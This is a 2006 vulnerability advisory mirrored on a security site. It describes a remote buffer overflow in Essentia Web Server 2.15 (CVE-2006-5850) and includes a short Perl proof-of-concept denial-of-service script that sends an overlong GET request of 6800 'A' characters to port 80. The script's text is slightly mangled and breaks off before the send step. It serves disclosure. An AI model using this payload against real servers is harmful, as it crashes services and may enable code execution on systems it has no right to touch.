|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1846 CVE : CVE-2006-5850 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : Yes Exploit Available : Yes Credit : CorryL Published : 10.11.2006
Advisory Content : -=[--------------------ADVISORY-------------------]=- Essentia Web Server V 2.15 Author:CorryL x0n3-h4ck.org -=[----------------------------------------------------]=- -=[+] Application: Essentia Web Server -=[+] Version: 2.15 -=[+] Vendor's URL: http://www.essencomp.com -=[+] Platform: Windows -=[+] Bug type: Buffer overflow -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL ..::[ Descriprion ]::.. Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers. ..::[ Bug ]::.. This software is affection from a buffer overflow what it would allow an attacker to perform arbitrary code on the system victim. Sending a GET+Ax6800 request, he would succeed to write above the seh point. ..::[ Proof Of Concept ]::.. #!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts('h:', %args); if (defined($args{'h'})) { $host = $args{'h'}; } print STDERR "n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-n"; print STDERR "-=[ Discovered By CorryL corryl80 at gmail.com ]=-n"; print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-nn"; if (!defined($host)) { Usage(); } $dos = "A"x6800; print "[+] Connect to $hostn"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Sending DOS byten"; $data = "GET /$dos rnrn"; ..::[ Workaround ]::.. nothing ..::[ Disclousure Timeline ]::.. [30/10/2006] - Vendor notification [04/11/2006] – No Vendor Response [04/11/2006] - Public disclousure ********************* Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB! Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/e06 0dd56/attachment.html  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |